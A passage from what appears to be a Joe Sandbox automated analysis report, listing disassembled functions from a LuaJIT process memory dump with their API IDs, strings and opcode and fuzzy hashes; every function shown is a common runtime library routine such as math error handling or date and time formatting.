                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_get_daylight
                                                      • String ID:
                                                      • API String ID: 72036449-0
                                                      • Opcode ID: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                      • Instruction ID: e296ded3b75cfc5621ffe3c9fa6d0649cac3cbef2ef6d5bdee882e229c502338
                                                      • Opcode Fuzzy Hash: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                      • Instruction Fuzzy Hash: B451B032E08642C6F7687B2CC81537DE580DB6275EF994135FB0E462DDEAADE840CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DF19C0 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3461063567-0
                                                      • Opcode ID: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                      • Instruction ID: 97e7468663dd1559c7516bf429ff045990252e84c5b68005c1f9ccefbaa03571
                                                      • Opcode Fuzzy Hash: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                      • Instruction Fuzzy Hash: 5A31E536A18BC185E760AB19E4443ABB3A1F7DA785F904036E78D42B5CDFBDD1588B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC08C0 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                      • String ID:
                                                      • API String ID: 2321548817-0
                                                      • Opcode ID: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                      • Instruction ID: 52913c1a9197e3c035e2fda5090855b28b8d345dbf8165f65c73e9fe99f1f728
                                                      • Opcode Fuzzy Hash: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                      • Instruction Fuzzy Hash: 29116975B0968182FB547F5D980037DE290AFA6BA5F884230EB2D476DCDFACE441C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E94C2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                      • Instruction ID: 171b42b3708e33e1cce87630701bf66a7036e93b17b69a75f2287be8bd493caa
                                                      • Opcode Fuzzy Hash: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                      • Instruction Fuzzy Hash: 4C61A57691D11286E768AF2C824437CB7A1EB27B8EF941135DB0A4619DCFB9D481C630
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E95308 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                      • Instruction ID: 16b261fe5eda2957991ce539069eb47218a4e0978cd19118f9aba0366385edfd
                                                      • Opcode Fuzzy Hash: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                      • Instruction Fuzzy Hash: 1C617472A1925286E7A4AF2C805907CB765FF27B8FF941137D70B4629DCBB8D441CB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E950F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                      • Instruction ID: a0af526383dbd0d0448dd8753bf02dbb63ad1b749d1aaecd2111793c58d58127
                                                      • Opcode Fuzzy Hash: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                      • Instruction Fuzzy Hash: 1B61447291860286E764AE2D804937CB7B1EF27F8EF941176E70A462DDCFBCD485C621
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E957B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                      • Instruction ID: 34414980bafd9e0204761266decf99b103f3df083f0c0de3fa1c5bd2c6e2f408
                                                      • Opcode Fuzzy Hash: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                      • Instruction Fuzzy Hash: 1951627291920286F764AF2C804C37CB6A5EF27B9EF981137C75A5629DCBB8D485C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBB120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: e+000$gfff
                                                      • API String ID: 3215553584-3030954782
                                                      • Opcode ID: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                      • Instruction ID: bc84da20be61f8260d3751fe4369ff988b655cf23cdb0334d11ced7284b112f5
                                                      • Opcode Fuzzy Hash: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                      • Instruction Fuzzy Hash: 4F514962B187C546E724DF3DD98036EAB91E7A2B94F888331E79847BD9CE6CD440C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB0BD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$fmod
                                                      • API String ID: 1757819995-3213614193
                                                      • Opcode ID: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                      • Instruction ID: 06ccb7167babe2a40e6b0479c4601de082a15831016d3235cb12ff94bd4af0d0
                                                      • Opcode Fuzzy Hash: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                      • Instruction Fuzzy Hash: A451FC21D2DB8549E723A73994917BAD7A8AF733C9F849332FA49315A9DF5DB0034210
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E68050 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID: $$type parameter
                                                      • API String ID: 3764944385-1705267328
                                                      • Opcode ID: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                      • Instruction ID: 374d8a99e4633cee2c862e8a5415298830b3bcb1cd7fb2369a5be14d3dc9ff4a
                                                      • Opcode Fuzzy Hash: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                      • Instruction Fuzzy Hash: 47510336618B4586DB60DB49E49012EF7A0F7D9BA4F544622EF9D877A8DFBCD440CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBCB88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      • Opcode ID: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                      • Instruction ID: 971a85cbcef9c166fa7bbf48c7d20b9c965e2ef1c4c0e8a0001b102f946957b6
                                                      • Opcode Fuzzy Hash: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                      • Instruction Fuzzy Hash: 1441B43271CA8185DB20EF69E4843AAA760FBA9789F844131EF4D87798DF7CD541CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBEE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$pow
                                                      • API String ID: 1757819995-713443511
                                                      • Opcode ID: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                      • Instruction ID: bc924ad8110bb132dbca691db1c471bf1abe63c02fa5808b4b8070b3e298aa4b
                                                      • Opcode Fuzzy Hash: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                      • Instruction Fuzzy Hash: CD214172D18AC487E770DF18E08066BFAA0FBEA349F501325F78906958CBBDD1859B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC02B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_errno_from_matherr
                                                      • String ID: tanh
                                                      • API String ID: 1187470696-874243715
                                                      • Opcode ID: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                      • Instruction ID: 042b0b703c998aed2b841007c0abe22ce7f924a9087766a3e9f5d7bec4c47387
                                                      • Opcode Fuzzy Hash: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                      • Instruction Fuzzy Hash: 0B212F36A18645CBD760DF6CA48026AB3A1FB9A745F904235F78D82B5ADE7CE440CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB95DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CompareStringtry_get_function
                                                      • String ID: CompareStringEx
                                                      • API String ID: 3328479835-2590796910
                                                      • Opcode ID: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                      • Instruction ID: 6a5be3ccff85e6e87f8860f686f6f998684eff94fca3c4130db2608314dafc7b
                                                      • Opcode Fuzzy Hash: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                      • Instruction Fuzzy Hash: 58112C75608B8186D760DB59B4802AAB7A0FB9ABC4F54413AEF8D43B5DCF7CD4508B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB987C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: DateFormattry_get_function
                                                      • String ID: GetDateFormatEx
                                                      • API String ID: 595753042-159735388
                                                      • Opcode ID: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                      • Instruction ID: ca65e4102c94845ad1ac8f74bbba3cf57efb41a3baafce45f07b120cddd2d033
                                                      • Opcode Fuzzy Hash: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                      • Instruction Fuzzy Hash: 11114C71A08B81C6E750DB59B44009AB7A4FB99BC5F58423AFF8D43B6CCE7CD5148B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB99B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: FormatTimetry_get_function
                                                      • String ID: GetTimeFormatEx
                                                      • API String ID: 3261793192-1692793031
                                                      • Opcode ID: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
                                                      • Instruction ID: 5f2c0afd5fb1e61722daf95c35ce1b7ce8d93798f8bd5bd15ffbe87553deb91e
                                                      • Opcode Fuzzy Hash: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
                                                      • Instruction Fuzzy Hash: DD118C61A08B81C6E710DB5AB4400AAB7A0FB99BC5F980236FF8D43B6CCE7CD5408B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E914A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
